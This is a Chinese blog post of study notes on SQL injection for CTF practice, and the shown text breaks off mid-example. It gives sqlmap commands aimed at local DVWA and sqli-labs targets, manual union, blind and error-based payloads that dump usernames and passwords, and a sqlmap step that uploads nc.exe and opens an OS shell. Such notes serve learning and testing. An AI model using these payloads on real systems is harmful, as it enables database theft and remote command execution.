

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/flower.png">
  <link rel="icon" type="image/png" href="/img/flower.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="keep something">
  <meta name="author" content="luom">
  <meta name="keywords" content="">
  <title>SQL注入&amp;CTF例题 - RC9&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.1.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"romanc9.github.io","root":"/","version":"1.8.5","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"copy_btn":true,"image_zoom":{"enable":true},"lazyload":{"enable":true,"onlypost":false},"web_analytics":{"enable":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"nC7Rtx8EoAwWlShCEwdRsumO-gzGzoHsz","app_key":"sqlnn9nfpy9eU5bkSY3Rpkyb","server_url":"https://nc7rtx8e.lc-cn-n1-shared.com"}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.2.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Romanc9's blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('/img/post.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="SQL注入&CTF例题">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-09-06 17:17" pubdate>
        2021年9月6日 下午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      10.5k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      136
       分钟
    </span>
  

  
  
    
      <!-- LeanCloud 统计文章PV -->
      <span id="leancloud-page-views-container" class="post-meta" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="leancloud-page-views"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">SQL注入&amp;CTF例题</h1>
            
              <p class="note note-info">
                
                  本文最后更新于：2024年1月4日 下午
                
              </p>
            
            <div class="markdown-body">
              <h1 id="介绍与原理">介绍与原理📖</h1>
<h2 id="tips">TIPS</h2>
<ol type="1">
<li><p>爆不出来结果试试十六进制编码的名字【from不可，where可】，库名也可以用函数database()代替【<a target="_blank" rel="noopener" href="https://saucer-man.com/information_security/101.html">参考</a>】</p>
<ul>
<li>十六进制：<strong>sql语句能用16进制地方的最好用16进制，因为单引号双引号可能造成一些错误</strong></li>
<li>不可16进制编码的地方：sql关键字：如from、select、from后的名字也不行</li>
<li>可16进制的：where条件的字段、函数参数</li>
</ul></li>
<li><p>盲注and or
失败后试宽字节注入<code>%df%27 union select 1,2%23</code>
【<strong>报错即注入成功</strong>】</p></li>
<li><p>流程：</p>
<p><strong>一般手工注入的姿势为：判断时什么注入，有无过滤关键词 --&gt;
获取数据库用户、版本、当前数据库 --&gt; 获取数据库的某个表 --&gt;
获取字段 --&gt; 获取数据</strong></p></li>
<li><p>几个常用函数：</p>
<ol type="1">
<li>version()——MySQL版本</li>
<li>user()——用户名</li>
<li>database()——数据库名</li>
<li>@<span class="citation" data-cites="datadir">@datadir</span>——数据库路径</li>
<li>@<span class="citation" data-cites="version_compile_os">@version_compile_os</span>——操作系统版本</li>
</ol></li>
<li><p>这里一般要用到连接函数</p>
<ol type="1">
<li>concat(str1,str2,...)直接连接字符串，没有分隔符</li>
<li>concat_ws(separator, str1,
str2,...)连接字符串，中间用separator分割</li>
<li>group_concat()用来连接多行的值，用逗号分割</li>
</ol></li>
<li><p><span style="background:#FF9999;">注意！</span>不同的参数不一定都能注入，理论上都可以，但是有的是数字有的是字符注意区分不同的注入语法！</p></li>
<li><p>burpsuite
GET后面的参数注入时注意把空格变成<code>+</code>，否则认为是隔开符</p></li>
</ol>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439842.png" srcset="/img/loading.gif"></p>
<h2 id="sqlmap">sqlmap</h2>
<p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/fa77f2ed788b">简书常用命令大全</a>
<a target="_blank" rel="noopener" href="https://m.freebuf.com/sectool/164608.html">freebuf
sqlmap总结，大全，【很多】</a></p>
<p><a target="_blank" rel="noopener" href="https://wooyun.kieran.top/#!/drops/25.sqlmap%E7%94%A8%E6%88%B7%E6%89%8B%E5%86%8C">**乌云
sqlmap手册</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/bmjoker/p/9326258.html">思维导图的博客+命令</a></p>
<p><img src="https://img-blog.csdnimg.cn/20190311094049471.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0ZseV9ocHM=,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" alt="2"></p>
<h3 id="技巧点">技巧点</h3>
<ol type="1">
<li><p>要登陆的，登陆后生成cookie，sqlmap时要加上 <pre><code class="hljs jboss-cli">sqlmap -u <span class="hljs-string">&quot;http://127.0.0.1:8000/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#&quot;</span> <span class="hljs-params">--cookie=</span><span class="hljs-string">&quot;PHPSESSID=j1ro8g2ei0vcug3k37arohdd44; security=low&quot;</span> <span class="hljs-params">--batch</span></code></pre></p></li>
<li><p>对post请求表单式注入，可用两种方法</p></li>
</ol>
<ul>
<li>使用burpsuite抓包，将数据包内容复制下来保存在文本中，然后使用SQLMap
-r进行post注入</li>
</ul>
<pre><code class="hljs moonscript">sqlmap -r \Desktop\xxx.txt <span class="hljs-comment">--batch</span></code></pre>
<ul>
<li>直接用--data "表单参数【form data】"或--forms自动解析表单
<pre><code class="hljs jboss-cli">sqlmap.py -u <span class="hljs-string">&quot;http://127.0.0.1:8000/vulnerabilities/sqli/&quot;</span> <span class="hljs-params">--cookie=</span><span class="hljs-string">&quot;PHPSESSID=j1ro8g2ei0vcug3k37arohdd44; security=medium&quot;</span> <span class="hljs-params">--data</span> <span class="hljs-string">&quot;id=1&amp;Submit=Submit&quot;</span></code></pre></li>
</ul>
<ol start="3" type="1">
<li>针对dvwa高安全级别下，High级别的查询提交页面与查询结果显示页面不是同一个，也没有执行302跳转的<a target="_blank" rel="noopener" href="https://www.jianshu.com/p/e263ea40fe25">wp</a></li>
</ol>
<ul>
<li>用<code>--second-order="xxxurl"</code></li>
<li>使用于查询数据提交、结果显示分别在2各个不同的页面中
<pre><code class="hljs jboss-cli">sqlmap <span class="hljs-params">--url=</span><span class="hljs-string">&quot;http://localhost:8001/dvwa/vulnerabilities/sqli/session-input.php&quot;</span> <span class="hljs-params">--data=</span><span class="hljs-string">&quot;id=1&amp;Submit=Submit&quot;</span> <span class="hljs-params">--second-order=</span><span class="hljs-string">&quot;http://localhost:8001/dvwa/vulnerabilities/sqli/&quot;</span> <span class="hljs-params">--cookie=</span><span class="hljs-string">&quot;security=high; PHPSESSID=g5mep9dj1vmkjiha8qnpfpn2i7&quot;</span> <span class="hljs-params">--batch</span></code></pre></li>
<li>也可以保存文件后用第二种方法再--second</li>
<li>这时sqli.txt文件中对应是查询数据提交时的POST数据包的内容，其中已经包含有cookie信息、以及POST请求体中的Form
data数据，<strong>所以命令中不需要单独在写</strong></li>
</ul>
<ol start="4" type="1">
<li><p>针对查询特定库/表/字段报错的=》编码绕过 &gt; 爆表名: &gt;
?id=1%df%27 union select 1,2,table_name from information_schema.tables
where table_schema=mydbs%23 &gt; 发现报错。。。可能有过滤 &gt;
那么把mydbs转成16进制:0x6d79646273
(..字符转16进制即可，要转对，有个网址16进制换是转错的。。浪费我好多时间)
&gt; ?id=1%df%27 union select 1,2,table_name from
information_schema.tables where table_schema=0x6d79646273%23</p></li>
<li><p>设置具体sql注入技术</p>
<p>--technique B 布尔盲注</p>
<p>--technique E 报错注入</p>
<p>--technique U union查询注入</p>
<p>--technique S 堆叠注入</p>
<p>--technique T 时间盲注</p>
<p>--technique Q 内联查询注入</p>
<pre><code class="hljs awk">sqlmap -u http:<span class="hljs-regexp">//</span><span class="hljs-number">192.168</span>.<span class="hljs-number">1.121</span><span class="hljs-regexp">/sqli/</span>Less-<span class="hljs-number">1</span>/?id=<span class="hljs-number">1</span> --technique T --time-sec <span class="hljs-number">3</span> --dbs 
<span class="hljs-regexp">//</span>--time -sec 时间盲注时间为<span class="hljs-number">3</span></code></pre></li>
<li><p><strong>使用Sqlmap进行Cookie注入</strong></p>
<p>在SQLmap中有一个参数“--Level”,==当“leavel&gt;=2”时就会检测COOKIE后面的参数，当“level&gt;3”时将会检测User-Agent和Referer==,这为COOKIE的注入提供了便利：</p>
<p><pre><code class="hljs jboss-cli">sqlmap -u  http:<span class="hljs-string">//xxx.xx.xx.xx</span><span class="hljs-function">:xx</span>/test.php  <span class="hljs-params">--cookie</span> id=1 <span class="hljs-params">--dbs</span> <span class="hljs-params">--leavel</span> 2</code></pre></p></li>
<li><p>只有root才能读写文件，load_file</p></li>
<li><p>如果你想看到sqlmap发送的测试payload最好的等级就是3。</p></li>
<li><p>避免过多的错误请求被屏蔽，可用参数</p></li>
</ol>
<pre><code class="hljs ada"><span class="hljs-number">1</span>、<span class="hljs-comment">--safe-url：提供一个安全不错误的连接，每隔一段时间都会去访问一下。</span>
<span class="hljs-number">2</span>、<span class="hljs-comment">--safe-freq：提供一个安全不错误的连接，每次测试请求之后都会再访问一边安全连接。</span></code></pre>
<ol start="10" type="1">
<li><p>指定参数：-p</p>
<p><strong>sqlmap默认测试所有的GET和POST参数，当--level的值大于等于2的时候也会测试HTTP
Cookie头的值，当大于等于3的时候也会测试User-Agent和HTTP
Referer头的值。但是你可以手动用-p参数设置想要测试的参数。例如： -p
"id,user-anget"</strong></p></li>
<li><p>在有些时候web服务器使用了URL重写，导致无法直接使用sqlmap测试参数，可以在想测试的参数后面加*</p></li>
</ol>
<pre><code class="hljs vim"><span class="hljs-keyword">python</span> sqlmap.<span class="hljs-keyword">py</span> -<span class="hljs-keyword">u</span> <span class="hljs-string">&quot;http://targeturl/param1/value1*/param2/value2/&quot;</span>
sqlmap将会测试value1的位置是否可注入。</code></pre>
<ol start="12" type="1">
<li><p>--prefix：前缀和--suffix：后缀</p>
<p>需要在注入的payload的前面或者后面加一些字符，来保证payload的正常执行。</p>
<pre><code class="hljs sql">python sqlmap.py -u &quot;http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1&quot; -p id <span class="hljs-comment">--prefix &quot;’)&quot; --suffix &quot;AND (’abc’=’abc&quot;</span>

$query = &quot;<span class="hljs-keyword">SELECT</span> * <span class="hljs-keyword">FROM</span> <span class="hljs-keyword">users</span> <span class="hljs-keyword">WHERE</span> <span class="hljs-keyword">id</span>=(’<span class="hljs-string">&quot; . $_GET[’id’] . &quot;</span>’) <span class="hljs-keyword">LIMIT</span> <span class="hljs-number">0</span>, <span class="hljs-number">1</span><span class="hljs-string">&quot;; </span>
<span class="hljs-string">这样执行的SQL语句变成：</span>
<span class="hljs-string">$query = &quot;</span><span class="hljs-keyword">SELECT</span> * <span class="hljs-keyword">FROM</span> <span class="hljs-keyword">users</span> <span class="hljs-keyword">WHERE</span> <span class="hljs-keyword">id</span>=(’<span class="hljs-number">1</span>’) &lt;PAYLOAD&gt; <span class="hljs-keyword">AND</span> (’abc’=’abc’) <span class="hljs-keyword">LIMIT</span> <span class="hljs-number">0</span>, <span class="hljs-number">1</span><span class="hljs-string">&quot;; </span></code></pre></li>
<li><p>--level:探测等级</p>
<p>5个等级，默认是1</p>
<p><strong>sqlmap使用的payload可以在xml/payloads.xml中看到，你也可以根据相应的格式添加自己的payload。</strong></p>
<p>HTTP Cookie在level为2的时候就会测试，HTTP
User-Agent/Referer头在level为3的时候就会测试。</p>
<p>总之在你<strong>不确定哪个payload或者参数为注入点的时候</strong>，为了保证全面性，建议使用高的level值</p></li>
<li><p>--risk 风险等级</p>
<p>共有四个风险等级，默认是1会测试大部分的测试语句，2会增加基于事件的测试语句，3会增加OR语句的SQL注入测试。</p>
<p>为什么叫风险，<strong>例如在UPDATE的语句中，注入一个OR的测试语句，可能导致更新的整个表，可能造成很大的风险。</strong></p></li>
<li><p>还可以爆破数据库用户明文密码<strong>--passwords</strong></p></li>
<li><p>暴力破解</p>
<p><strong>--common-tables</strong>：暴力破解表名</p>
<pre><code class="hljs angelscript">适用环境：
当使用--tables无法获取到数据库的表时，可以使用此参数
<span class="hljs-number">1.</span>MySQL数据库版本小于<span class="hljs-number">5.0</span>，没有information_schema表。
<span class="hljs-number">2</span>、数据库是Microssoft Access，系统表MSysObjects是不可读的（默认）。
<span class="hljs-number">3</span>、当前用户没有权限读取系统中保存数据结构的表的权限。</code></pre></li>
</ol>
<p><strong>--common-columns</strong>：暴力破解列名</p>
<ol start="17" type="1">
<li><p>读文件：</p>
<p>--file-read "C:/example.txt"</p>
<pre><code class="hljs pgsql">前提:有权限、数据库为MySQL，PostgreSQL或Microsoft <span class="hljs-keyword">SQL</span> <span class="hljs-keyword">Server</span></code></pre></li>
</ol>
<p>18.上传文件</p>
<p>​
--file-write,--file-dest，前提：当数据库为MySQL，PostgreSQL或Microsoft
SQL
Server，并且当前用户有权限使用特定的函数。上传的文件可以是文本也可以是二进制文件。</p>
<pre><code class="hljs vim"><span class="hljs-keyword">python</span> sqlmap.<span class="hljs-keyword">py</span> -<span class="hljs-keyword">u</span> <span class="hljs-string">&quot;http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1&quot;</span> --<span class="hljs-keyword">file</span>-<span class="hljs-keyword">write</span> <span class="hljs-string">&quot;/software/nc.exe.packed&quot;</span> --<span class="hljs-keyword">file</span>-dest <span class="hljs-string">&quot;C:/WINDOWS/Temp/nc.exe&quot;</span> -v <span class="hljs-number">1</span></code></pre>
<ol start="19" type="1">
<li><p>运行操作系统命令</p>
<p><strong>--os-cmd</strong></p>
<p>--os-shell ：也可以模拟一个真实的shell，可以输入你想执行的命令</p>
<pre><code class="hljs dockerfile">$ python sqlmap.py -u <span class="hljs-string">&quot;http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1&quot;</span> \
--os-<span class="hljs-keyword">cmd</span><span class="bash"> id</span></code></pre></li>
<li><p>sqlmap还可以和msf联动，</p></li>
<li><p>权限问题：</p>
<pre><code class="hljs routeros">默认情况下MySQL在Windows上以SYSTEM权限运行，PostgreSQL在Windows与Linux中是低权限运行，Microsoft SQL<span class="hljs-built_in"> Server </span>2000默认是以SYSTEM权限运行，Microsoft SQL<span class="hljs-built_in"> Server </span>2005与2008大部分是以NETWORK SERVICE有时是LOCAL SERVICE。</code></pre></li>
</ol>
<h2 id="手注">手注</h2>
<p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/fcc5d8e69d68">简书，sql一些函数总结，精简结合实例易理解</a></p>
<p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/54b630f1ec35">简书手注初级保姆级流程**</a></p>
<ol type="1">
<li>探测字段数：用1，2，3测，或order
by2（测是不是两个字段）/3（测三个）</li>
<li>Mysql安装后默认会创建三个数据库：information_schema、mysql和test</li>
</ol>
<p>###利用information库手注 3. 获取当前数据库用户【假设字段为2】
<pre><code class="hljs gauss"><span class="hljs-number">1</span>&#x27; <span class="hljs-built_in">union</span> <span class="hljs-built_in">select</span> <span class="hljs-built_in">user</span>(),<span class="hljs-number">2</span> <span class="hljs-meta">#</span></code></pre> 4.
获取所有数据库名称【information_schema库下的schemata表中保存着DBMS中的所有数据库名称信息】
<pre><code class="hljs capnproto"><span class="hljs-number">1</span>&#x27; <span class="hljs-keyword">union</span> select <span class="hljs-number">1</span>,schema_name <span class="hljs-keyword">from</span> information_schema.schemata <span class="hljs-comment">#</span></code></pre></p>
<ol start="5" type="1">
<li>获取当前数据库下<strong>所有表名</strong> <pre><code class="hljs sql">1&#x27; union <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-keyword">group_concat</span>(table_name) <span class="hljs-keyword">from</span> information_schema.tables <span class="hljs-keyword">where</span> table_schema=<span class="hljs-keyword">database</span>() <span class="hljs-comment">#</span></code></pre></li>
<li>获取表中所有列名 <pre><code class="hljs sql">1&#x27; union <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-keyword">group_concat</span>(column_name) <span class="hljs-keyword">from</span> information_schema.columns <span class="hljs-keyword">where</span> table_name=<span class="hljs-string">&#x27;users&#x27;</span> <span class="hljs-comment">#</span></code></pre></li>
<li>导出具体数据</li>
</ol>
<ul>
<li>一次性获取users表中<strong>所有行的</strong>user和password数据，用符合'--'连接每一组中user和password，每一组"user--password"又分别用逗号隔开，集中在一起输出结果
<pre><code class="hljs sql">1&#x27; union <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-keyword">group_concat</span>(<span class="hljs-keyword">concat_ws</span>(<span class="hljs-string">&#x27;--&#x27;</span>,<span class="hljs-keyword">user</span>,<span class="hljs-keyword">password</span>)) <span class="hljs-keyword">from</span> <span class="hljs-keyword">users</span> <span class="hljs-comment">#</span></code></pre></li>
<li>或者分别获取每一行数据 <pre><code class="hljs sql">1&#x27; union <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-keyword">concat_ws</span>(<span class="hljs-string">&#x27;--&#x27;</span>,<span class="hljs-keyword">user</span>,<span class="hljs-keyword">password</span>) <span class="hljs-keyword">from</span> <span class="hljs-keyword">users</span> <span class="hljs-comment">#</span></code></pre></li>
</ul>
<h3 id="注入类型">注入类型</h3>
<p>sqlmap 支持5种漏洞检测类型:</p>
<ul>
<li>基于布尔的盲注检测 
(如果一个url的地址为xxxx.php?id=1,那么我们可以尝试下的加上 and
1=1(和没加and1=1结果保持一致) 和 and
1=2(和不加and1=2结果不一致),则我们基本可以确定是存在布尔注入的. )</li>
<li>基于时间的盲注检测(和基于布尔的检测有些类似.通过mysql的 sleep(int))
来观察浏览器的响应是否等待了你设定的那个值
如果等待了,则表示执行了sleep,则基本确定是存在sql注入的</li>
<li>基于错误的检测
(组合查询语句,看是否报错(在服务器没有抑制报错信息的前提下),==如果报错
则证明我们组合的查询语句特定的字符被应用了==,如果不报错,则我们输入的特殊字符很可能被服务器给过滤掉(也可能是抑制了错误输出.))</li>
<li>基于union联合查询的检测(适用于如果某个web项目对查询结果只展示一条而我们需要多条的时候
则使用union联合查询搭配concat还进行获取更多的信息)</li>
<li>基于堆叠查询的检测(首先看服务器支不支持多语句查询,一般服务器sql语句都是写死的,某些特定的地方用占位符来接受用户输入的变量,这样即使我们加and
也只能执行select(也不一定select,主要看应用场景,总之就是服务端写了什么,你就能执行什么)查询语句,如果能插入分号;则我们后面可以自己组合update,insert,delete等语句来进行进一步操作)</li>
</ul>
<h3 id="数字型注入和字符型注入">数字型注入和字符型注入</h3>
<p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/5edd7a58a69e">简书，精简**</a></p>
<ol type="1">
<li>一个参数是int，一个是string</li>
<li>输入<code>1 and 1=2</code>，报错即为数字型注入【执行and逻辑判断】，否则为字符型注入（字符串内的<code>1 and 1=2</code>不执行and逻辑判断），要去利用单引号闭合来注入</li>
<li>数字型不需要单引号来闭合，而字符串一般需要通过单引号来闭合的</li>
</ol>
<h3 id="搜索注入">搜索注入</h3>
<p><a target="_blank" rel="noopener" href="https://www.codenong.com/cs106446931/">个人博客，精简</a>
类似字符型注入，不过参数处变成<code>'%xxx%'</code> ，注意要绕过% -
几种绕过方法： <pre><code class="hljs gcode"><span class="hljs-string">&#x27;and 1=1 and &#x27;</span><span class="hljs-meta">%</span><span class="hljs-string">&#x27;=&#x27;</span>

<span class="hljs-meta">%</span><span class="hljs-string">&#x27; and 1=1--&#x27;</span>

<span class="hljs-meta">%</span><span class="hljs-string">&#x27; and 1=1 and &#x27;</span><span class="hljs-meta">%</span><span class="hljs-string">&#x27;=&#x27;</span></code></pre> eg: <pre><code class="hljs routeros">例如我们在搜索框输入 李%‘<span class="hljs-keyword">and</span>’1’=‘1’ <span class="hljs-keyword">and</span>%’=’
SELECT * <span class="hljs-keyword">from</span> table where<span class="hljs-built_in"> users </span>like’%李%‘<span class="hljs-keyword">and</span>’1’=‘1’<span class="hljs-keyword">and</span>’%’=’%’</code></pre> -
剩余爆库手段大体等于字符注入</p>
<h3 id="布尔盲注">布尔盲注</h3>
<p><a target="_blank" rel="noopener" href="http://127.0.0.1/sqli-labs/Less-8/?id=1‘">简单，简书手工布尔盲注</a></p>
<p>小例子： - 查询字段名中包含 username 的表 <pre><code class="hljs pgsql"><span class="hljs-keyword">SELECT</span> <span class="hljs-built_in">table_name</span> <span class="hljs-keyword">FROM</span> information_schema.<span class="hljs-keyword">columns</span> <span class="hljs-keyword">WHERE</span> <span class="hljs-built_in">column_name</span> <span class="hljs-keyword">LIKE</span> <span class="hljs-string">&#x27;%user%&#x27;</span>;</code></pre> - 查表名
<pre><code class="hljs pgsql"><span class="hljs-keyword">AND</span> <span class="hljs-keyword">SELECT</span> SUBSTR(<span class="hljs-built_in">table_name</span>,<span class="hljs-number">1</span>,<span class="hljs-number">1</span>) <span class="hljs-keyword">FROM</span> information_schema.<span class="hljs-keyword">tables</span> &gt; <span class="hljs-string">&#x27;A&#x27;</span></code></pre></p>
<ol type="1">
<li><p>通过构造sql语句，通过判断语句是否<strong>执行成功</strong>来对数据进行猜解。【无回显，只返回对错】</p></li>
<li><p><strong>只返回true/false，不返回报错</strong>【返回报错则说明有union注入】</p></li>
<li><p>例如:</p>
<p>先判断当前数据库的长度
<code>http://127.0.0.1/sqli-labs/Less-8/?id=1' and length(database())&gt;8 --+</code>
发现说明等级8的时候，页面就没有显示。那么说明database（）的长度是8</p></li>
<li><p>常用函数及注入技巧</p></li>
</ol>
<pre><code class="hljs python"><span class="hljs-comment">#left (a, b)从左侧截取a的前b位 ❗注意是前几位，不是第几位</span>
left (database(),<span class="hljs-number">1</span>)

<span class="hljs-built_in">ord</span>=<span class="hljs-built_in">ascii</span> 
<span class="hljs-built_in">ascii</span>(x)=<span class="hljs-number">97</span> 判断x的<span class="hljs-built_in">ascii</span>码是否等于<span class="hljs-number">97</span></code></pre>
<p>🔴<span style="background:#FF9999;">注意：mid第二个参数从1开始,</span></p>
<p>🟠<span style="background:#FFFFBB;">limit第一个参数从0开始</span></p>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041459346.jpeg" srcset="/img/loading.gif"></p>
<h3 id="报错注入">报错注入</h3>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/wangtanzhi/p/12577891.html">***个人博客王叹之总结，宝典</a></p>
<p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/bc35f8dd4f7c">简书
12种报错注入+万能语句，简洁</a></p>
<h4 id="pow溢出报错注入">pow()溢出报错注入</h4>
<ul>
<li>要点：查询正确会因为pow溢出而报错，否则不报错只是说查询不到=》查询出错，类似布尔注入</li>
</ul>
<pre><code class="hljs mysql">select 1 and case1 and pow(999,999)发生报错，说明case1为真
select 1 and case2 and pow(999,999)没报错，只是查询不到，说明case2为假
case可以作为我们用来判断的语句，进行布尔盲注</code></pre>
<ul>
<li><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439843.png" srcset="/img/loading.gif" alt="image-20210522142152524" style="zoom:67%;"></li>
</ul>
<h4 id="join..using">join..using</h4>
<ol type="1">
<li>用法：MySQL 的 JOIN 在两个或多个表中查询数据。【<a target="_blank" rel="noopener" href="https://www.runoob.com/mysql/mysql-join.html">菜鸟教程</a>、<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_46706771/article/details/112769113">csdn例子加教程</a>】</li>
<li>有重复的列名时报错并返回一个重复的列名</li>
<li><strong>就是利用join使得mysql列名重复，报错返回重复的列名得到我们想要的信息</strong></li>
</ol>
<blockquote>
<p>通过对想要查询列名的表与其自身建议内连接，会由于冗余的原因(相同列名存在)，而发生错误。</p>
<p>并且报错信息会存在重复的列名，可以使用 USING 表达式声明内连接（INNER
JOIN）条件【排去重复的列名最后得到全部列名信息】来避免报错</p>
</blockquote>
<p><img src="https://img2020.cnblogs.com/blog/1625650/202003/1625650-20200329143159098-1312087130.png" srcset="/img/loading.gif" alt="join"></p>
<h4 id="extractvalueupdatexml">extractvalue()、updatexml()</h4>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/zpy1998zpy/article/details/80631036">大佬csdn</a>
、 <a target="_blank" rel="noopener" href="https://developer.aliyun.com/article/692723">阿里云</a>、、<a target="_blank" rel="noopener" href="https://my.oschina.net/u/4610683/blog/4492284">详解</a> 、<a target="_blank" rel="noopener" href="https://www.cnblogs.com/wangtanzhi/p/12577891.html">王叹之也有</a></p>
<pre><code class="hljs pgsql">extractvalue() :对<span class="hljs-type">XML</span>文档进行查询的函数
语法：extractvalue(目标<span class="hljs-type">xml</span>文档，<span class="hljs-type">xml</span>路径)

第二个参数 <span class="hljs-type">xml</span>中的位置是可操作的地方，<span class="hljs-type">xml</span>文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式，如果我们写入其他格式，就会报错，并且会返回我们写入的非法格式内容，而这个非法的内容就是我们想要查询的内容。

正常查询 第二个参数的位置格式 为 /xxx/xx/xx/xx ,即使查询不到也不会报错

<span class="hljs-keyword">select</span> username <span class="hljs-keyword">from</span> <span class="hljs-keyword">security</span>.<span class="hljs-keyword">user</span> <span class="hljs-keyword">where</span> <span class="hljs-keyword">and</span> (extractvalue(‘anything’,concat(‘/’,(<span class="hljs-keyword">select</span> <span class="hljs-keyword">database</span>()))))
这里在’anything’中查询 位置是 /<span class="hljs-keyword">database</span>()的内容，

但是：
<span class="hljs-keyword">select</span> username <span class="hljs-keyword">from</span> <span class="hljs-keyword">security</span>.<span class="hljs-keyword">user</span> <span class="hljs-keyword">where</span> id=<span class="hljs-number">1</span> <span class="hljs-keyword">and</span> (extractvalue(‘anything’,concat(‘~’,(<span class="hljs-keyword">select</span> <span class="hljs-keyword">database</span>()))))
